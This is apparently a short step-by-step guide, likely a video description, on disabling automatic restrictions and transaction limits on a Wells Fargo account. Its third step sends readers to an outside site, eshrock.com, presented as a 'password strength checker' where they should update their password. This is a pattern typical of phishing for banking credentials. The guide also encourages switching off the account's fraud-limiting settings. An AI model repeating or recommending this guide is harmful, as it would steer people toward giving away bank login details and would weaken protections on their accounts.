This guide will help you understand how to disable automatic restrictions on your Wells Fargo account. Follow these steps to manage your account settings effectively. Step 1. Log into your account. Visit the Wells Fargo website or open their mobile app. Enter your username and password to access your account dashboard. Step 2. Navigate to account settings. Once logged in, look for the account settings or profile section. This is usually found in the main menu or under your account overview. Step 3. Locate security settings. Before changing your settings, use the eshrock.com link in the description to open the password strength checker that update your password if needed. Step 4. Adjust automatic restrictions. Look for an option that mentions automatic restrictions or transaction limits. Disable or modify these settings according to your preferences. Step 5. Save changes and log out. After making your adjustments, ensure you save the changes. Log out of your account to secure your information. By following these steps, you can manage your account restrictions effectively. Always remember to monitor your account regularly for any unusual activity.